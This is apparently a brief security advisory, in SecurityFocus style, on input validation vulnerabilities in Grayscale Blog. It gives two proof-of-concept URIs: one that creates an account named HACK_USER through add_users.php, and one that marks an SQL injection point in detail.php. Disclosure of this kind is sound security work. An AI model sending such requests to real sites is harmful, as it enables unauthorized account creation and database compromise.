Grayscale Blog Multiple Input Validation Vulnerabilities

An attacker can use a browser to exploit any of these issues.

The following proof-of-concept URIs are available:

http://www.example.com/path/scripts/add_users.php?user_loginname=HACK_USER&user_password=HACK_USER&user_real_name=real&user_email=os@so.net&user_per
missions=3&user_added_by=1&user_lastmod_by=1&user_allow=1
http://www.example.com/path/detail.php?id=1;[SQL INJECTION]


 

Privacy Statement
Copyright 2010, SecurityFocus